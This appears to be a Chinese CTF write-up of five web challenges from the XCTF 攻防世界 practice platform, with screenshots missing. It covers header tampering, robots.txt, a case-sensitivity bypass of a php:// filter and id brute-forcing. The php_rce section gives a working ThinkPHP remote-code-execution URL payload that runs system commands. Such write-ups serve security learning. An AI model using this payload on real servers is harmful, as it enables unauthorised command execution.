攻防世界Web进阶区题目Writeup(持续更新)

0x00  baby_web

  难度不大,根据题目提示"初始页面",联想到index.php,但是如果在URL中直接输入index.php会自动跳转到1.php,所以bp直接抓包,修改http请求就可以了.

攻防世界Web进阶区题目Writeup(持续更新)

 

   拿到flag


0x01  Training-WWW-Robots

  考察到了robots协议,那么直接url输入robots.txt查看

攻防世界Web进阶区题目Writeup(持续更新)

 

   看到提示fl0g.php

攻防世界Web进阶区题目Writeup(持续更新)

 

  拿到flag


 0x02  php_rce

  ThinkPHP框架漏洞,payload网上一大把,以后有时间会写篇文章仔细分析这个漏洞,这里不再赘述

   1.看看根目录下的文件 [?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /]

攻防世界Web进阶区题目Writeup(持续更新)

 

   2.看到flag,尝试查看内容[?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag]

攻防世界Web进阶区题目Writeup(持续更新)

 

   拿到flag.


 

0x03  Web_php_include

  考察文件包含漏洞中的任意代码执行

  进入题目给了一段代码,功能很简单,就是将page字符串中的"php://"关键字给替换为空,但是strstr函数对大小写敏感,所以直接大写绕过.

  攻防世界Web进阶区题目Writeup(持续更新)

 

   查看之

  攻防世界Web进阶区题目Writeup(持续更新)

 

   拿到flag


0x04  ics-06

  拿到题目只有"报表中心"可以点开

攻防世界Web进阶区题目Writeup(持续更新)

 

   看到[id=1]本以为是sql注入,但是尝试加引号等等操作之后没啥反应,索性上bp爆破试试看

攻防世界Web进阶区题目Writeup(持续更新)

 

 

   看到id=2333时响应长度和其他值不一样

 攻防世界Web进阶区题目Writeup(持续更新)

 

  拿到flag


待更新----

 

上一篇:信安协会内部赛Writeup


下一篇:网鼎杯2020青龙组writeup-web